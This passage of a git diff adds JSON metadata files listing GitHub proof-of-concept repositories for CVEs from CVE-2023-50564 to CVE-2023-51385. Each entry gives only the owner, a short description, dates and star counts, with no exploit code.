"https:\/\/avatars.githubusercontent.com\/u\/108242154?v=4", + "html_url": "https:\/\/github.com\/Rai2en", + "user_view_type": "public" + }, + "html_url": "https:\/\/github.com\/Rai2en\/CVE-2023-50564_Pluck-v4.7.18_PoC", + "description": "A Proof of Concept for CVE-2023-50564 vulnerability in Pluck CMS version 4.7.18", + "fork": false, + "created_at": "2024-07-21T20:15:10Z", + "updated_at": "2024-12-16T18:54:55Z", + "pushed_at": "2024-11-27T03:32:02Z", + "stargazers_count": 20, + "watchers_count": 20, + "has_discussions": false, + "forks_count": 4, + "allow_forking": true, + "is_template": false, + "web_commit_signoff_required": false, + "topics": [], + "visibility": "public", + "forks": 4, + "watchers": 20, + "score": 0, + "subscribers_count": 1 + }, + { + "id": 837227856, + "name": "CVE-2023-50564", + "full_name": "ipuig\/CVE-2023-50564", + "owner": { + "login": "ipuig", + "id": 109107529, + "avatar_url": "https:\/\/avatars.githubusercontent.com\/u\/109107529?v=4", + "html_url": "https:\/\/github.com\/ipuig", + "user_view_type": "public" + }, + "html_url": "https:\/\/github.com\/ipuig\/CVE-2023-50564", + "description": "CVE-2023-50564 PoC", + "fork": false, + "created_at": "2024-08-02T13:37:39Z", + "updated_at": "2024-08-02T14:03:32Z", + "pushed_at": "2024-08-02T14:01:59Z", + "stargazers_count": 0, + "watchers_count": 0, + "has_discussions": false, + "forks_count": 0, + "allow_forking": true, + "is_template": false, + "web_commit_signoff_required": false, + "topics": [], + "visibility": "public", + "forks": 0, + "watchers": 0, + "score": 0, + "subscribers_count": 1 + }, + { + "id": 843762610, + "name": "CVE-2023-50564", + "full_name": "rwexecute\/CVE-2023-50564", + "owner": { + "login": "rwexecute", + "id": 50677809, + "avatar_url": "https:\/\/avatars.githubusercontent.com\/u\/50677809?v=4", + "html_url": "https:\/\/github.com\/rwexecute", + "user_view_type": "public" + }, + "html_url": "https:\/\/github.com\/rwexecute\/CVE-2023-50564", + "description": "Python Script to exploit CVE-2023-50564", + "fork": false, + "created_at": "2024-08-17T10:46:02Z", + "updated_at": "2024-10-14T12:43:15Z", + "pushed_at": "2024-10-14T12:43:11Z", + "stargazers_count": 0, + "watchers_count": 0, + "has_discussions": false, + "forks_count": 0, + "allow_forking": true, + "is_template": false, + "web_commit_signoff_required": false, + "topics": [], + "visibility": "public", + "forks": 0, + "watchers": 0, + "score": 0, + "subscribers_count": 1 + }, + { + "id": 847072591, + "name": "CVE-2023-50564-pluck", + "full_name": "thefizzyfish\/CVE-2023-50564-pluck", + "owner": { + "login": "thefizzyfish", + "id": 94797978, + "avatar_url": "https:\/\/avatars.githubusercontent.com\/u\/94797978?v=4", + "html_url": "https:\/\/github.com\/thefizzyfish", + "user_view_type": "public" + }, + "html_url": "https:\/\/github.com\/thefizzyfish\/CVE-2023-50564-pluck", + "description": "CVE-2023-50564 - An arbitrary file upload vulnerability in the component \/inc\/modules_install.php of Pluck-CMS v4.7.18 allows attackers to execute arbitrary code via uploading a crafted ZIP file.", + "fork": false, + "created_at": "2024-08-24T19:09:21Z", + "updated_at": "2024-10-03T19:30:39Z", + "pushed_at": "2024-10-03T19:30:36Z", + "stargazers_count": 1, + "watchers_count": 1, + "has_discussions": false, + "forks_count": 0, + "allow_forking": true, + "is_template": false, + "web_commit_signoff_required": false, + "topics": [], + "visibility": "public", + "forks": 0, + "watchers": 1, + "score": 0, + "subscribers_count": 1 + }, + { + "id": 873106151, + "name": "CVE-2023-50564", + "full_name": "Mrterrestrial\/CVE-2023-50564", + "owner": { + "login": "Mrterrestrial", + "id": 118843990, + "avatar_url": "https:\/\/avatars.githubusercontent.com\/u\/118843990?v=4", + "html_url": "https:\/\/github.com\/Mrterrestrial", + "user_view_type": "public" + }, + "html_url": "https:\/\/github.com\/Mrterrestrial\/CVE-2023-50564", + "description": "This script exploits the file upload feature in Pluck CMS v4.7.18 to upload a malicious PHP file, enabling remote access via a reverse shell. Once uploaded, this backdoor grants the attacker server access with web server permissions, allowing further actions within the system or network.", + "fork": false, + "created_at": "2024-10-15T15:58:06Z", + "updated_at": "2024-11-07T20:30:03Z", + "pushed_at": "2024-10-15T17:20:37Z", + "stargazers_count": 1, + "watchers_count": 1, + "has_discussions": false, + "forks_count": 0, + "allow_forking": true, + "is_template": false, + "web_commit_signoff_required": false, + "topics": [], + "visibility": "public", + "forks": 0, + "watchers": 1, + "score": 0, + "subscribers_count": 1 + }, + { + "id": 879407389, + "name": "Pluck-CMS-v4.7.18-Remote-Code-Execution-CVE-2023-50564", + "full_name": "0xDTC\/Pluck-CMS-v4.7.18-Remote-Code-Execution-CVE-2023-50564", + "owner": { + "login": "0xDTC", + "id": 95960398, + "avatar_url": "https:\/\/avatars.githubusercontent.com\/u\/95960398?v=4", + "html_url": "https:\/\/github.com\/0xDTC", + "user_view_type": "public" + }, + "html_url": "https:\/\/github.com\/0xDTC\/Pluck-CMS-v4.7.18-Remote-Code-Execution-CVE-2023-50564", + "description": "Refurbish exploit in bash", + "fork": false, + "created_at": "2024-10-27T20:21:31Z", + "updated_at": "2025-01-07T12:54:17Z", + "pushed_at": "2025-01-07T12:54:13Z", + "stargazers_count": 0, + "watchers_count": 0, + "has_discussions": false, + "forks_count": 0, + "allow_forking": true, + "is_template": false, + "web_commit_signoff_required": false, + "topics": [], + "visibility": "public", + "forks": 0, + "watchers": 0, + "score": 0, + "subscribers_count": 1 + }, + { + "id": 906963385, + "name": "CVE-2023-50564", + "full_name": "xpltive\/CVE-2023-50564", + "owner": { + "login": "xpltive", + "id": 25474369, + "avatar_url": "https:\/\/avatars.githubusercontent.com\/u\/25474369?v=4", + "html_url": "https:\/\/github.com\/xpltive", + "user_view_type": "public" + }, + "html_url": "https:\/\/github.com\/xpltive\/CVE-2023-50564", + "description": "Pluck-CMS v4.7.18 RCE exploit", + "fork": false, + "created_at": "2024-12-22T12:41:05Z", + "updated_at": "2024-12-27T02:44:06Z", + "pushed_at": "2024-12-22T12:59:14Z", + "stargazers_count": 1, + "watchers_count": 1, + "has_discussions": false, + "forks_count": 0, + "allow_forking": true, + "is_template": false, + "web_commit_signoff_required": false, + "topics": [], + "visibility": "public", + "forks": 0, + "watchers": 1, + "score": 0, + "subscribers_count": 1 + } +] \ No newline at end of file diff --git a/2023/CVE-2023-50596.json b/2023/CVE-2023-50596.json new file mode 100644 index 0000000000..b67d078e50 --- /dev/null +++ b/2023/CVE-2023-50596.json @@ -0,0 +1,33 @@ +[ + { + "id": 734100171, + "name": "CVE-2023-50596", + "full_name": "chandraprarikraj\/CVE-2023-50596", + "owner": { + "login": "chandraprarikraj", + "id": 154472358, + "avatar_url": "https:\/\/avatars.githubusercontent.com\/u\/154472358?v=4", + "html_url": "https:\/\/github.com\/chandraprarikraj", + "user_view_type": "public" + }, + "html_url": "https:\/\/github.com\/chandraprarikraj\/CVE-2023-50596", + "description": null, + "fork": false, + "created_at": "2023-12-20T21:43:28Z", + "updated_at": "2023-12-20T21:43:28Z", + "pushed_at": "2023-12-20T21:44:18Z", + "stargazers_count": 0, + "watchers_count": 0, + "has_discussions": false, + "forks_count": 0, + "allow_forking": true, + "is_template": false, + "web_commit_signoff_required": false, + "topics": [], + "visibility": "public", + "forks": 0, + "watchers": 0, + "score": 0, + "subscribers_count": 1 + } +] \ No newline at end of file diff --git a/2023/CVE-2023-50643.json b/2023/CVE-2023-50643.json new file mode 100644 index 0000000000..9ac701f5ff --- /dev/null +++ b/2023/CVE-2023-50643.json @@ -0,0 +1,33 @@ +[ + { + "id": 729209972, + "name": "CVE-2023-50643", + "full_name": "giovannipajeu1\/CVE-2023-50643", + "owner": { + "login": "giovannipajeu1", + "id": 83291215, + "avatar_url": "https:\/\/avatars.githubusercontent.com\/u\/83291215?v=4", + "html_url": "https:\/\/github.com\/giovannipajeu1", + "user_view_type": "public" + }, + "html_url": "https:\/\/github.com\/giovannipajeu1\/CVE-2023-50643", + "description": "CVE-2023-50643", + "fork": false, + "created_at": "2023-12-08T16:37:16Z", + "updated_at": "2024-06-11T18:01:05Z", + "pushed_at": "2023-12-15T21:06:14Z", + "stargazers_count": 7, + "watchers_count": 7, + "has_discussions": false, + "forks_count": 0, + "allow_forking": true, + "is_template": false, + "web_commit_signoff_required": false, + "topics": [], + "visibility": "public", + "forks": 0, + "watchers": 7, + "score": 0, + "subscribers_count": 1 + } +] \ No newline at end of file diff --git a/2023/CVE-2023-50685.json b/2023/CVE-2023-50685.json new file mode 100644 index 0000000000..27cc351e63 --- /dev/null +++ b/2023/CVE-2023-50685.json @@ -0,0 +1,43 @@ +[ + { + "id": 729822594, + "name": "Hipcam-RTSP-Format-Validation-Vulnerability", + "full_name": "MaximilianJungblut\/Hipcam-RTSP-Format-Validation-Vulnerability", + "owner": { + "login": "MaximilianJungblut", + "id": 62648617, + "avatar_url": "https:\/\/avatars.githubusercontent.com\/u\/62648617?v=4", + "html_url": "https:\/\/github.com\/MaximilianJungblut", + "user_view_type": "public" + }, + "html_url": "https:\/\/github.com\/MaximilianJungblut\/Hipcam-RTSP-Format-Validation-Vulnerability", + "description": "This POC exploits a format validation vulnerability in the RTSP service of the Hipcam RealServer\/V1.0, inducing a crash for approximately 45 seconds by injecting random data into the 'client_port' parameter during the RTSP SETUP request. Hipcam RealServer\/V1.0 is used in many Hipcam Cameras. | CVE-2023-50685", + "fork": false, + "created_at": "2023-12-10T13:21:43Z", + "updated_at": "2024-05-02T14:40:08Z", + "pushed_at": "2024-05-02T14:40:04Z", + "stargazers_count": 1, + "watchers_count": 1, + "has_discussions": false, + "forks_count": 1, + "allow_forking": true, + "is_template": false, + "web_commit_signoff_required": false, + "topics": [ + "camera", + "crash", + "exploit", + "format-validation", + "hipcam", + "poc", + "proof-of-concept", + "rtsp", + "vulnerability" + ], + "visibility": "public", + "forks": 1, + "watchers": 1, + "score": 0, + "subscribers_count": 1 + } +] \ No newline at end of file diff --git a/2023/CVE-2023-5070.json b/2023/CVE-2023-5070.json new file mode 100644 index 0000000000..9ec112ba68 --- /dev/null +++ b/2023/CVE-2023-5070.json @@ -0,0 +1,33 @@ +[ + { + "id": 706058561, + "name": "CVE-2023-5070", + "full_name": "RandomRobbieBF\/CVE-2023-5070", + "owner": { + "login": "RandomRobbieBF", + "id": 51722811, + "avatar_url": "https:\/\/avatars.githubusercontent.com\/u\/51722811?v=4", + "html_url": "https:\/\/github.com\/RandomRobbieBF", + "user_view_type": "public" + }, + "html_url": "https:\/\/github.com\/RandomRobbieBF\/CVE-2023-5070", + "description": "Social Media Share Buttons & Social Sharing Icons <= 2.8.5 - Information Exposure", + "fork": false, + "created_at": "2023-10-17T08:19:09Z", + "updated_at": "2024-08-12T20:32:53Z", + "pushed_at": "2023-10-17T08:23:31Z", + "stargazers_count": 0, + "watchers_count": 0, + "has_discussions": false, + "forks_count": 1, + "allow_forking": true, + "is_template": false, + "web_commit_signoff_required": false, + "topics": [], + "visibility": "public", + "forks": 1, + "watchers": 0, + "score": 0, + "subscribers_count": 2 + } +] \ No newline at end of file diff --git a/2023/CVE-2023-50780.json b/2023/CVE-2023-50780.json new file mode 100644 index 0000000000..bf17506d30 --- /dev/null +++ b/2023/CVE-2023-50780.json @@ -0,0 +1,40 @@ +[ + { + "id": 904960617, + "name": "CVE-2023-50780", + "full_name": "mbadanoiu\/CVE-2023-50780", + "owner": { + "login": "mbadanoiu", + "id": 18383407, + "avatar_url": "https:\/\/avatars.githubusercontent.com\/u\/18383407?v=4", + "html_url": "https:\/\/github.com\/mbadanoiu", + "user_view_type": "public" + }, + "html_url": "https:\/\/github.com\/mbadanoiu\/CVE-2023-50780", + "description": "CVE-2023-50780: Dangerous MBeans Accessible via Jolokia API in Apache ActiveMQ Artemis", + "fork": false, + "created_at": "2024-12-17T22:07:24Z", + "updated_at": "2024-12-18T01:22:01Z", + "pushed_at": "2024-12-18T01:21:28Z", + "stargazers_count": 0, + "watchers_count": 0, + "has_discussions": false, + "forks_count": 0, + "allow_forking": true, + "is_template": false, + "web_commit_signoff_required": false, + "topics": [ + "0-day", + "cve", + "cve-2023-50780", + "cves", + "log4jmx", + "remote-code-execution" + ], + "visibility": "public", + "forks": 0, + "watchers": 0, + "score": 0, + "subscribers_count": 1 + } +] \ No newline at end of file diff --git a/2023/CVE-2023-50868.json b/2023/CVE-2023-50868.json new file mode 100644 index 0000000000..244696cb2b --- /dev/null +++ b/2023/CVE-2023-50868.json @@ -0,0 +1,33 @@ +[ + { + "id": 774480851, + "name": "NSEC3-Encloser-Attack", + "full_name": "Goethe-Universitat-Cybersecurity\/NSEC3-Encloser-Attack", + "owner": { + "login": "Goethe-Universitat-Cybersecurity", + "id": 163991309, + "avatar_url": "https:\/\/avatars.githubusercontent.com\/u\/163991309?v=4", + "html_url": "https:\/\/github.com\/Goethe-Universitat-Cybersecurity", + "user_view_type": "public" + }, + "html_url": "https:\/\/github.com\/Goethe-Universitat-Cybersecurity\/NSEC3-Encloser-Attack", + "description": "This project generates DNS zonefiles with custom NSEC3 parameters to reproduce and evaluate the attacks in CVE-2023-50868.", + "fork": false, + "created_at": "2024-03-19T16:13:14Z", + "updated_at": "2024-10-24T19:54:07Z", + "pushed_at": "2024-05-27T12:07:49Z", + "stargazers_count": 6, + "watchers_count": 6, + "has_discussions": false, + "forks_count": 0, + "allow_forking": true, + "is_template": false, + "web_commit_signoff_required": false, + "topics": [], + "visibility": "public", + "forks": 0, + "watchers": 6, + "score": 0, + "subscribers_count": 0 + } +] \ No newline at end of file diff --git a/2023/CVE-2023-5089.json b/2023/CVE-2023-5089.json new file mode 100644 index 0000000000..14cf4c6992 --- /dev/null +++ b/2023/CVE-2023-5089.json @@ -0,0 +1,40 @@ +[ + { + "id": 805244897, + "name": "CVE-2023-5089", + "full_name": "Cappricio-Securities\/CVE-2023-5089", + "owner": { + "login": "Cappricio-Securities", + "id": 102907425, + "avatar_url": "https:\/\/avatars.githubusercontent.com\/u\/102907425?v=4", + "html_url": "https:\/\/github.com\/Cappricio-Securities", + "user_view_type": "public" + }, + "html_url": "https:\/\/github.com\/Cappricio-Securities\/CVE-2023-5089", + "description": "Defender Security < 4.1.0 - Protection Bypass (Hidden Login Page)", + "fork": false, + "created_at": "2024-05-24T07:14:55Z", + "updated_at": "2024-09-06T13:09:49Z", + "pushed_at": "2024-06-24T08:42:13Z", + "stargazers_count": 1, + "watchers_count": 1, + "has_discussions": false, + "forks_count": 0, + "allow_forking": true, + "is_template": false, + "web_commit_signoff_required": false, + "topics": [ + "cve", + "cve-2023-5089", + "pentesting", + "wapt", + "wordpress", + "xss" + ], + "visibility": "public", + "forks": 0, + "watchers": 1, + "score": 0, + "subscribers_count": 0 + } +] \ No newline at end of file diff --git a/2023/CVE-2023-50917.json b/2023/CVE-2023-50917.json new file mode 100644 index 0000000000..647e3c5380 --- /dev/null +++ b/2023/CVE-2023-50917.json @@ -0,0 +1,33 @@ +[ + { + "id": 711386901, + "name": "CVE-2023-50917", + "full_name": "Chocapikk\/CVE-2023-50917", + "owner": { + "login": "Chocapikk", + "id": 88535377, + "avatar_url": "https:\/\/avatars.githubusercontent.com\/u\/88535377?v=4", + "html_url": "https:\/\/github.com\/Chocapikk", + "user_view_type": "public" + }, + "html_url": "https:\/\/github.com\/Chocapikk\/CVE-2023-50917", + "description": "MajorDoMo Unauthenticated RCE: Deep Dive & Exploitation Techniques", + "fork": false, + "created_at": "2023-10-29T05:10:09Z", + "updated_at": "2024-08-12T20:32:57Z", + "pushed_at": "2023-12-18T01:15:30Z", + "stargazers_count": 14, + "watchers_count": 14, + "has_discussions": false, + "forks_count": 4, + "allow_forking": true, + "is_template": false, + "web_commit_signoff_required": false, + "topics": [], + "visibility": "public", + "forks": 4, + "watchers": 14, + "score": 0, + "subscribers_count": 2 + } +] \ No newline at end of file diff --git a/2023/CVE-2023-51000.json b/2023/CVE-2023-51000.json new file mode 100644 index 0000000000..d6ec979c8e --- /dev/null +++ b/2023/CVE-2023-51000.json @@ -0,0 +1,33 @@ +[ + { + "id": 756306550, + "name": "CVE-2023-51000", + "full_name": "Team-Byerus\/CVE-2023-51000", + "owner": { + "login": "Team-Byerus", + "id": 156511157, + "avatar_url": "https:\/\/avatars.githubusercontent.com\/u\/156511157?v=4", + "html_url": "https:\/\/github.com\/Team-Byerus", + "user_view_type": "public" + }, + "html_url": "https:\/\/github.com\/Team-Byerus\/CVE-2023-51000", + "description": null, + "fork": false, + "created_at": "2024-02-12T12:06:07Z", + "updated_at": "2024-02-12T12:06:08Z", + "pushed_at": "2024-02-12T12:06:17Z", + "stargazers_count": 0, + "watchers_count": 0, + "has_discussions": false, + "forks_count": 0, + "allow_forking": true, + "is_template": false, + "web_commit_signoff_required": false, + "topics": [], + "visibility": "public", + "forks": 0, + "watchers": 0, + "score": 0, + "subscribers_count": 0 + } +] \ No newline at end of file diff --git a/2023/CVE-2023-51073.json b/2023/CVE-2023-51073.json new file mode 100644 index 0000000000..7d0b69f59b --- /dev/null +++ b/2023/CVE-2023-51073.json @@ -0,0 +1,33 @@ +[ + { + "id": 739242348, + "name": "CVE-2023-51073", + "full_name": "christopher-pace\/CVE-2023-51073", + "owner": { + "login": "christopher-pace", + "id": 22531478, + "avatar_url": "https:\/\/avatars.githubusercontent.com\/u\/22531478?v=4", + "html_url": "https:\/\/github.com\/christopher-pace", + "user_view_type": "public" + }, + "html_url": "https:\/\/github.com\/christopher-pace\/CVE-2023-51073", + "description": "Firmware Update Server Verification Vulnerability on Buffalo LS210D Version 1.78-0.03", + "fork": false, + "created_at": "2024-01-05T05:16:18Z", + "updated_at": "2024-01-07T02:12:37Z", + "pushed_at": "2024-01-07T01:40:37Z", + "stargazers_count": 0, + "watchers_count": 0, + "has_discussions": false, + "forks_count": 0, + "allow_forking": true, + "is_template": false, + "web_commit_signoff_required": false, + "topics": [], + "visibility": "public", + "forks": 0, + "watchers": 0, + "score": 0, + "subscribers_count": 2 + } +] \ No newline at end of file diff --git a/2023/CVE-2023-51119.json b/2023/CVE-2023-51119.json new file mode 100644 index 0000000000..dda6db4606 --- /dev/null +++ b/2023/CVE-2023-51119.json @@ -0,0 +1,33 @@ +[ + { + "id": 789571635, + "name": "CVE-2023-51119", + "full_name": "OscarAkaElvis\/CVE-2023-51119", + "owner": { + "login": "OscarAkaElvis", + "id": 5803348, + "avatar_url": "https:\/\/avatars.githubusercontent.com\/u\/5803348?v=4", + "html_url": "https:\/\/github.com\/OscarAkaElvis", + "user_view_type": "public" + }, + "html_url": "https:\/\/github.com\/OscarAkaElvis\/CVE-2023-51119", + "description": "Improper Access Control on D-Link DIR-605L router", + "fork": false, + "created_at": "2024-04-20T23:37:10Z", + "updated_at": "2024-07-07T13:54:45Z", + "pushed_at": "2024-04-20T23:41:59Z", + "stargazers_count": 1, + "watchers_count": 1, + "has_discussions": false, + "forks_count": 0, + "allow_forking": true, + "is_template": false, + "web_commit_signoff_required": false, + "topics": [], + "visibility": "public", + "forks": 0, + "watchers": 1, + "score": 0, + "subscribers_count": 1 + } +] \ No newline at end of file diff --git a/2023/CVE-2023-51126.json b/2023/CVE-2023-51126.json new file mode 100644 index 0000000000..76eac48c45 --- /dev/null +++ b/2023/CVE-2023-51126.json @@ -0,0 +1,33 @@ +[ + { + "id": 737937769, + "name": "CVE-2023-51126", + "full_name": "risuxx\/CVE-2023-51126", + "owner": { + "login": "risuxx", + "id": 47944560, + "avatar_url": "https:\/\/avatars.githubusercontent.com\/u\/47944560?v=4", + "html_url": "https:\/\/github.com\/risuxx", + "user_view_type": "public" + }, + "html_url": "https:\/\/github.com\/risuxx\/CVE-2023-51126", + "description": null, + "fork": false, + "created_at": "2024-01-02T02:31:06Z", + "updated_at": "2024-01-03T14:30:50Z", + "pushed_at": "2024-01-02T02:38:11Z", + "stargazers_count": 1, + "watchers_count": 1, + "has_discussions": false, + "forks_count": 0, + "allow_forking": true, + "is_template": false, + "web_commit_signoff_required": false, + "topics": [], + "visibility": "public", + "forks": 0, + "watchers": 1, + "score": 0, + "subscribers_count": 1 + } +] \ No newline at end of file diff --git a/2023/CVE-2023-51127.json b/2023/CVE-2023-51127.json new file mode 100644 index 0000000000..d9a17ee262 --- /dev/null +++ b/2023/CVE-2023-51127.json @@ -0,0 +1,33 @@ +[ + { + "id": 737940013, + "name": "CVE-2023-51127", + "full_name": "risuxx\/CVE-2023-51127", + "owner": { + "login": "risuxx", + "id": 47944560, + "avatar_url": "https:\/\/avatars.githubusercontent.com\/u\/47944560?v=4", + "html_url": "https:\/\/github.com\/risuxx", + "user_view_type": "public" + }, + "html_url": "https:\/\/github.com\/risuxx\/CVE-2023-51127", + "description": null, + "fork": false, + "created_at": "2024-01-02T02:43:09Z", + "updated_at": "2024-01-03T14:30:37Z", + "pushed_at": "2024-01-02T02:46:58Z", + "stargazers_count": 1, + "watchers_count": 1, + "has_discussions": false, + "forks_count": 0, + "allow_forking": true, + "is_template": false, + "web_commit_signoff_required": false, + "topics": [], + "visibility": "public", + "forks": 0, + "watchers": 1, + "score": 0, + "subscribers_count": 1 + } +] \ No newline at end of file diff --git a/2023/CVE-2023-51214.json b/2023/CVE-2023-51214.json new file mode 100644 index 0000000000..abf450cb9e --- /dev/null +++ b/2023/CVE-2023-51214.json @@ -0,0 +1,33 @@ +[ + { + "id": 734095645, + "name": "CVE-2023-51214", + "full_name": "chandraprarikraj\/CVE-2023-51214", + "owner": { + "login": "chandraprarikraj", + "id": 154472358, + "avatar_url": "https:\/\/avatars.githubusercontent.com\/u\/154472358?v=4", + "html_url": "https:\/\/github.com\/chandraprarikraj", + "user_view_type": "public" + }, + "html_url": "https:\/\/github.com\/chandraprarikraj\/CVE-2023-51214", + "description": null, + "fork": false, + "created_at": "2023-12-20T21:23:33Z", + "updated_at": "2023-12-20T21:23:34Z", + "pushed_at": "2023-12-20T21:35:28Z", + "stargazers_count": 0, + "watchers_count": 0, + "has_discussions": false, + "forks_count": 0, + "allow_forking": true, + "is_template": false, + "web_commit_signoff_required": false, + "topics": [], + "visibility": "public", + "forks": 0, + "watchers": 0, + "score": 0, + "subscribers_count": 1 + } +] \ No newline at end of file diff --git a/2023/CVE-2023-51281.json b/2023/CVE-2023-51281.json new file mode 100644 index 0000000000..c98d46492f --- /dev/null +++ b/2023/CVE-2023-51281.json @@ -0,0 +1,33 @@ +[ + { + "id": 734782806, + "name": "CVE-2023-51281", + "full_name": "geraldoalcantara\/CVE-2023-51281", + "owner": { + "login": "geraldoalcantara", + "id": 152064551, + "avatar_url": "https:\/\/avatars.githubusercontent.com\/u\/152064551?v=4", + "html_url": "https:\/\/github.com\/geraldoalcantara", + "user_view_type": "public" + }, + "html_url": "https:\/\/github.com\/geraldoalcantara\/CVE-2023-51281", + "description": "Multiple cross-site scripting (XSS) vulnerabilities in \/customer_support\/ajax.php?action=save_customer in Customer Support System 1.0 allow authenticated attackers to execute to execute arbitrary web scripts or HTML via a crafted payload injected into the “firstname”, \"lastname\", \"middlename\", \"contact\" or “address” parameters.", + "fork": false, + "created_at": "2023-12-22T15:51:43Z", + "updated_at": "2023-12-22T16:08:00Z", + "pushed_at": "2023-12-22T16:07:21Z", + "stargazers_count": 0, + "watchers_count": 0, + "has_discussions": false, + "forks_count": 0, + "allow_forking": true, + "is_template": false, + "web_commit_signoff_required": false, + "topics": [], + "visibility": "public", + "forks": 0, + "watchers": 0, + "score": 0, + "subscribers_count": 1 + } +] \ No newline at end of file diff --git a/2023/CVE-2023-51385.json b/2023/CVE-2023-51385.json new file mode 100644 index 0000000000..0671dbb085 --- /dev/null +++ b/2023/CVE-2023-51385.json @@ -0,0 +1,684 @@ +[ + { + "id": 697796057, + "name": "poc-proxycommand-vulnerable", + "full_name": "vin01\/poc-proxycommand-vulnerable", + "owner": { + "login": "vin01", + "id": 30344579, + "avatar_url": "https:\/\/avatars.githubusercontent.com\/u\/30344579?v=4", + "html_url": "https:\/\/github.com\/vin01", + "user_view_type": "public" + }, + "html_url": "https:\/\/github.com\/vin01\/poc-proxycommand-vulnerable", + "description": "Proof of conept to exploit vulnerable proxycommand configurations on ssh clients (CVE-2023-51385)", + "fork": false, + "created_at": "2023-09-28T13:48:17Z", + "updated_at": "2024-10-24T10:18:18Z", + "pushed_at": "2023-10-12T19:06:26Z", + "stargazers_count": 47, + "watchers_count": 47, + "has_discussions": false, + "forks_count": 37, + "allow_forking": true, + "is_template": false, + "web_commit_signoff_required": false, + "topics": [], + "visibility": "public", + "forks": 37, + "watchers": 47, + "score": 0, + "subscribers_count": 1 + }, + { + "id": 735476980, + "name": "CVE-2023-51385", + "full_name": "FeatherStark\/CVE-2023-51385", + "owner": { + "login": "FeatherStark", + "id": 42148584, + "avatar_url": "https:\/\/avatars.githubusercontent.com\/u\/42148584?v=4", + "html_url": "https:\/\/github.com\/FeatherStark", + "user_view_type": "public" + }, + "html_url": "https:\/\/github.com\/FeatherStark\/CVE-2023-51385", + "description": null, + "fork": false, + "created_at": "2023-12-25T04:34:02Z", + "updated_at": "2023-12-25T04:34:02Z", + "pushed_at": "2023-12-25T04:35:13Z", + "stargazers_count": 0, + "watchers_count": 0, + "has_discussions": false, + "forks_count": 0, + "allow_forking": true, + "is_template": false, + "web_commit_signoff_required": false, + "topics": [], + "visibility": "public", + "forks": 0, + "watchers": 0, + "score": 0, + "subscribers_count": 1 + }, + { + "id": 735514578, + "name": "poc-cve-2023-51385", + "full_name": "watarium\/poc-cve-2023-51385", + "owner": { + "login": "watarium", + "id": 30005626, + "avatar_url": "https:\/\/avatars.githubusercontent.com\/u\/30005626?v=4", + "html_url": "https:\/\/github.com\/watarium", + "user_view_type": "public" + }, + "html_url": "https:\/\/github.com\/watarium\/poc-cve-2023-51385", + "description": null, + "fork": false, + "created_at": "2023-12-25T07:43:29Z", + "updated_at": "2023-12-25T07:43:29Z", + "pushed_at": "2023-12-27T02:31:52Z", + "stargazers_count": 0, + "watchers_count": 0, + "has_discussions": false, + "forks_count": 0, + "allow_forking": true, + "is_template": false, + "web_commit_signoff_required": false, + "topics": [], + "visibility": "public", + "forks": 0, + "watchers": 0, + "score": 0, + "subscribers_count": 1 + }, + { + "id": 735584620, + "name": "CVE-2023-51385", + "full_name": "Le1a\/CVE-2023-51385", + "owner": { + "login": "Le1a", + "id": 97610822, + "avatar_url": "https:\/\/avatars.githubusercontent.com\/u\/97610822?v=4", + "html_url": "https:\/\/github.com\/Le1a", + "user_view_type": "public" + }, + "html_url": "https:\/\/github.com\/Le1a\/CVE-2023-51385", + "description": "OpenSSH ProxyCommand RCE", + "fork": false, + "created_at": "2023-12-25T12:51:05Z", + "updated_at": "2024-03-07T00:13:03Z", + "pushed_at": "2023-12-26T07:43:32Z", + "stargazers_count": 5, + "watchers_count": 5, + "has_discussions": false, + "forks_count": 9, + "allow_forking": true, + "is_template": false, + "web_commit_signoff_required": false, + "topics": [], + "visibility": "public", + "forks": 9, + "watchers": 5, + "score": 0, + "subscribers_count": 1 + }, + { + "id": 735589944, + "name": "CVE-2023-51385_test", + "full_name": "LtmThink\/CVE-2023-51385_test", + "owner": { + "login": "LtmThink", + "id": 110249505, + "avatar_url": "https:\/\/avatars.githubusercontent.com\/u\/110249505?v=4", + "html_url": "https:\/\/github.com\/LtmThink", + "user_view_type": "public" + }, + "html_url": "https:\/\/github.com\/LtmThink\/CVE-2023-51385_test", + "description": "一个验证对CVE-2023-51385", + "fork": false, + "created_at": "2023-12-25T13:13:25Z", + "updated_at": "2024-04-15T01:18:31Z", + "pushed_at": "2024-03-17T08:25:35Z", + "stargazers_count": 7, + "watchers_count": 7, + "has_discussions": false, + "forks_count": 17, + "allow_forking": true, + "is_template": false, + "web_commit_signoff_required": false, + "topics": [], + "visibility": "public", + "forks": 17, + "watchers": 7, + "score": 0, + "subscribers_count": 1 + }, + { + "id": 735851357, + "name": "CVE-2023-51385_poc-test", + "full_name": "WLaoDuo\/CVE-2023-51385_poc-test", + "owner": { + "login": "WLaoDuo", + "id": 69497874, + "avatar_url": "https:\/\/avatars.githubusercontent.com\/u\/69497874?v=4", + "html_url": "https:\/\/github.com\/WLaoDuo", + "user_view_type": "public" + }, + "html_url": "https:\/\/github.com\/WLaoDuo\/CVE-2023-51385_poc-test", + "description": "CVE-2023-51385;OpenSSH ProxyCommand RCE;OpenSSH <9.6 命令注入漏洞poc ", + "fork": false, + "created_at": "2023-12-26T09:01:02Z", + "updated_at": "2023-12-26T10:13:34Z", + "pushed_at": "2023-12-27T06:33:21Z", + "stargazers_count": 0, + "watchers_count": 0, + "has_discussions": false, + "forks_count": 8, + "allow_forking": true, + "is_template": false, + "web_commit_signoff_required": false, + "topics": [], + "visibility": "public", + "forks": 8, + "watchers": 0, + "score": 0, + "subscribers_count": 1 + }, + { + "id": 737146570, + "name": "CVE-2023-51385_test", + "full_name": "power1314520\/CVE-2023-51385_test", + "owner": { + "login": "power1314520", + "id": 37863351, + "avatar_url": "https:\/\/avatars.githubusercontent.com\/u\/37863351?v=4", + "html_url": "https:\/\/github.com\/power1314520", + "user_view_type": "public" + }, + "html_url": "https:\/\/github.com\/power1314520\/CVE-2023-51385_test", + "description": "一个验证对CVE-2023-51385", + "fork": false, + "created_at": "2023-12-30T01:08:29Z", + "updated_at": "2023-12-30T01:08:29Z", + "pushed_at": "2023-12-30T01:13:20Z", + "stargazers_count": 0, + "watchers_count": 0, + "has_discussions": false, + "forks_count": 0, + "allow_forking": true, + "is_template": false, + "web_commit_signoff_required": false, + "topics": [], + "visibility": "public", + "forks": 0, + "watchers": 0, + "score": 0, + "subscribers_count": 1 + }, + { + "id": 737934166, + "name": "CVE-2023-51385", + "full_name": "WOOOOONG\/CVE-2023-51385", + "owner": { + "login": "WOOOOONG", + "id": 40143329, + "avatar_url": "https:\/\/avatars.githubusercontent.com\/u\/40143329?v=4", + "html_url": 